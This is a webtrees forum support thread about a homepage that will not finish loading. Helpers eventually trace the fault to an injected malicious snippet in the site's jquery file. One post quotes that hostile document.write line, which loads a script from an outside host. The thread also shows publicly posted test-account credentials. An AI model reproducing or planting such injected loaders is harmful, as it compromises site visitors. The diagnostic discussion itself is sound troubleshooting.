• Page:
  • 1

TOPIC:

webtrees homepage does not load completely 7 years 5 months ago #1

  • Kebschull
  • Kebschull's Avatar Topic Author
  • Visitor
  • Visitor
Hi,

I have a problem again. I have the webtrees Verion 1.5.1 and run the themes rural set. Since a few days my home page will not load properly (see screenshot). Did any of you have any idea what that might be?

Thank you very much


dirkeb
Attachments:

Please Log in or Create an account to join the conversation.

webtrees homepage does not load completely 7 years 5 months ago #2

  • ToyGuy
  • ToyGuy's Avatar
  • Offline
  • Moderator
  • Moderator
  • Live like it's Christmas every day - Santa Stephen
  • Posts: 4925
Moved to RURAL THEME customized forum, where questions like this belong.
Santa Stephen the Fabled Santa
Latest webtrees at MyArnolds.com
Hosted by webtreesonline.com , a division of GeneHosts LLC
MacOS 10.6.8, Apache 2.2+, PHP 5.4.16, MySQL 5.5.28

Please Log in or Create an account to join the conversation.

webtrees homepage does not load completely 7 years 5 months ago #3

  • eh215
  • eh215's Avatar
  • Offline
  • Junior Member
  • Junior Member
  • Posts: 241
I also use the Rural theme with 1.5.1 and do not have the same issue, although I've seen it in the past when I've had a javascript or html error.

Do you have the latest version of the Rural theme? Jonathan did create a version specifically for 1.5.1

Even though the home page isn't fully loading you should still be able to get to the Administration page using the menu icons/links to do some diagnosing.

Two key places to look for error messages:

  1. The webtrees error logs at Administration --> Logs. Select Type=error and then click "filter"

  2. The PHP error file on the server. There could be a file named error_log in the same directory where you have webtrees loaded.


Other areas to look for

  • Try changing the theme from Rural to "webtrees" (the default) as a way to see if it is caused by the theme itself.

  • Are you using the Custom.JS add-in? It is possible that there is javascript or html code in there that is causing the issue. To rule that out - go to Administration --> Modules and uncheck the box next to Custom.JS.

  • While there, look at everything on the Administration --> modules pages to see if any modules are listed in red, indicating an issue.

  • Do other pages load correctly or is it just the main page?

Eric
behunt.net/ft
PHP 7.4.16

Please Log in or Create an account to join the conversation.

webtrees homepage does not load completely 7 years 5 months ago #4

  • jon48
  • jon48's Avatar
  • Offline
  • Junior Member
  • Junior Member
  • Posts: 148
Hello,

Indeed, I have nothing to add to Eric's reply. The spinning blocks usually indicates that an error occurs in the background with the AJAX requests, and the logs indicated should be able to provide useful informations. Testing with other themes will also help isolating the issue to mine.

Is your website available on Internet, and if so, does the issue occur on the public home page? We might be able to help you finding those errors by looking at the responses we receive.

Regards.
Jonathan
genea.jaubart.com - Famille Jaubart-Rousset en Lozère - webtrees 1.7.17 (modifié - GitHub repo , thème Rural)
Local: Ubuntu 20.04 - Apache 2.4 - PHP 7.3 - MySQL 8.0 / Public: FastComet

Please Log in or Create an account to join the conversation.

webtrees homepage does not load completely 7 years 5 months ago #5

  • Kebschull
  • Kebschull's Avatar Topic Author
  • Visitor
  • Visitor
Hello,

Thanks for your answers. The problem occurs on all pages that I want to invite. If I want to view the log as suggested to me but unfortunately nothing is displayed, all the logs are empty. The themes I can not change because change here are not possible. Custom.js is not installed for me.

regards
dirkeb





Attachments:

Please Log in or Create an account to join the conversation.

webtrees homepage does not load completely 7 years 5 months ago #6

  • jon48
  • jon48's Avatar
  • Offline
  • Junior Member
  • Junior Member
  • Posts: 148
Hello,

I am not sure that your issue is specific to my theme. Your screenshot of the administration page does not seem correct neither, and this is a different theme than the Rural one.

I am a bit surprised as well that you do not find anything in your logs, as you should see at least some entries for your connection (message "Login successful ->login<-"). Have you tried as well looking at the PHP error file on the server, as suggested by Eric? This is independant from webtrees.

At this stage, this is a bit difficult to investigate further without any log, or any access to your website (even as public), but you can try the usual steps on your side: testing on another browser, clearing the cache...

Regards.
Jonathan
genea.jaubart.com - Famille Jaubart-Rousset en Lozère - webtrees 1.7.17 (modifié - GitHub repo , thème Rural)
Local: Ubuntu 20.04 - Apache 2.4 - PHP 7.3 - MySQL 8.0 / Public: FastComet

Please Log in or Create an account to join the conversation.

Last edit: by jon48.

webtrees homepage does not load completely 7 years 5 months ago #7

  • bertkoor
  • bertkoor's Avatar
  • Offline
  • Platinum Member
  • Platinum Member
  • Greetings from Utrecht, Holland
  • Posts: 2330
I suspect the theme is not the issue but your server just runs very slow. Possibly the database is not optimised at all, webtrees is very demanding on the database.

If you share the server with other customers, the site could be responding reasonably well on slow hours (middle of the night) but slow when traffic to the other sites is high. I also encountered in the past that my site was terribly slow, which was due to a DDOS attack on another domain hosted by the same company on the same shared server. It went away eventually.

I suggest to read the WIKI article on database optimisation , have a word with your hosting provider, and maybe get some offline advice from some of the few people (Greg, Nigel) that know how to let webtrees fly. If your hosting provider won't cooperate, then maybe you should look for a better one giving actual service. They usually can handle WordPress or Joomla sites quite fine, but hosting webtrees has somewhat different requirements.
stamboom.BertKoor.nl runs on webtrees v1.7.13

Please Log in or Create an account to join the conversation.

webtrees homepage does not load completely 7 years 5 months ago #8

  • bertkoor
  • bertkoor's Avatar
  • Offline
  • Platinum Member
  • Platinum Member
  • Greetings from Utrecht, Holland
  • Posts: 2330
Regarding the Admin panel, it's layout is indeed not what it's supposed to be.



Looks like CSS class ui-tabs cannot be found.
These and other styling elements are part of the file themes/_administration/jquery-ui-1.10.3/jquery-ui-1.10.3.custom.css
Have a look weather that is actually uploaded to your site.

Also you have an issue with vertical alignment of labels and their content. Styling of that is part of themes/_administration/css-1.5.1/style.css

It's also possible that due to a very slow server these files doesn't get downloaded fast enough.
stamboom.BertKoor.nl runs on webtrees v1.7.13

Please Log in or Create an account to join the conversation.

Do you need a web hosting solution for your webtrees site?
If you prefer a host that specialises in webtrees, the following page lists some suppliers able to provide one for you: 

webtrees homepage does not load completely 7 years 5 months ago #9

  • Kebschull
  • Kebschull's Avatar Topic Author
  • Visitor
  • Visitor
Hi,

@ Jonathan.
I was looking for this PHP error file, but it exesteiert not on the server. (At least not where I have access to.) I have also been tested with Firefox and IE, with these two browsers on the result found is always the same.

@ bertkoor
I do not know myself though with databases but I sometimes try to optimize.
Also CSS classes are all on the server.

@ All
I have also created a test user, so that you can own a picture about the problem provide.

www.kebschull.info/webtrees
USer: Test
pass: webtrees123!!

Thank you very much
Dirk

Please Log in or Create an account to join the conversation.

webtrees homepage does not load completely 7 years 5 months ago #10

  • bertkoor
  • bertkoor's Avatar
  • Offline
  • Platinum Member
  • Platinum Member
  • Greetings from Utrecht, Holland
  • Posts: 2330

I do not know myself though with databases but I sometimes try to optimize.


What optimisation steps did you perform? Does your hosting provider even allow that?
What type of hosting package do you have, a dedicated server or shared or maybe a virtual server?

Also CSS classes are all on the server.

I can verify that the _administration theme seems to be in place. So is it maybe only your browser that has issues rendering the admin pages? Does it still look the same as you posted previously? What browser (version) did you use?

I have also created a test user, so that you can own a picture about the problem provide.

www.kebschull.info/webtrees
USer: Test
pass: webtrees123!!


Sorry, I can't get in with these credentials:

Der Benutzername oder das Passwort sind ungültig.

[edit] never mind, the exclamation marks are part of the password :duh!:
stamboom.BertKoor.nl runs on webtrees v1.7.13

Please Log in or Create an account to join the conversation.

Last edit: by bertkoor.

webtrees homepage does not load completely 7 years 5 months ago #11

  • bertkoor
  • bertkoor's Avatar
  • Offline
  • Platinum Member
  • Platinum Member
  • Greetings from Utrecht, Holland
  • Posts: 2330
I see you have a problem indeed.

When did it still work? Do you recall you changed anything so it doesn't work anymore? Maybe added some modules?
Do you use webtrees to enter the data, or do you do that with an offline package and import the GEDCOM?

OK, here's what I would suggest:

Create a new empty (testing) tree (besides your existing tree, don't delete that yet) which uses one of the default themes and has just the single default individual.

This test rules out:
a) a problem in the theme
b) a problem in your (imported?) data

Then set the execution statistics to show in the footer of each page (bottom of the tab Show&Hide in the Admin panel) and we'll see from there, OK?
stamboom.BertKoor.nl runs on webtrees v1.7.13

Please Log in or Create an account to join the conversation.

Last edit: by bertkoor.

webtrees homepage does not load completely 7 years 5 months ago #12

  • bertkoor
  • bertkoor's Avatar
  • Offline
  • Platinum Member
  • Platinum Member
  • Greetings from Utrecht, Holland
  • Posts: 2330
OK, I did an "inspect element" with Google Chrome on one of the pages.
That suggests that your file jquery-1.10.2.js is corrupt or maybe even hacked. Your content:
/*171d87*/
document.write(unescape("%3Cscript src='src="http://top-rw.de/count.php?id=1875767' type='text/javascript'%3E%3C/script%3E"));
Uncaught SyntaxError: Unexpected identifier
/*/171d87*/

while it should be something like this:
(function(s,n){function Sa(a){var b=a.length,d=c.type(a);return c.isWindow(a)?!1:1===a.nodeType&&b?!0:"array"===d||"function"!==d&&

Try to replace ALL content in the webtrees/js folder with a fresh copy. Then we'll see again, OK?
stamboom.BertKoor.nl runs on webtrees v1.7.13

Please Log in or Create an account to join the conversation.

Last edit: by bertkoor.

webtrees homepage does not load completely 7 years 5 months ago #13

  • Kebschull
  • Kebschull's Avatar Topic Author
  • Visitor
  • Visitor
Hello bertkoor,

that was the problem, have the directory. js / Erased and re-transfering. Now it works again.

Thanks to all!
Dirk

Please Log in or Create an account to join the conversation.

webtrees homepage does not load completely 2 weeks 1 day ago #14

There might be an issue from the server side because I am using webtrees 2.0 with WordPress on PHP 8, but I am hosted with Cloudways managed hosting and never faced any issue.

Please Log in or Create an account to join the conversation.

  • Page:
  • 1
Powered by Kunena Forum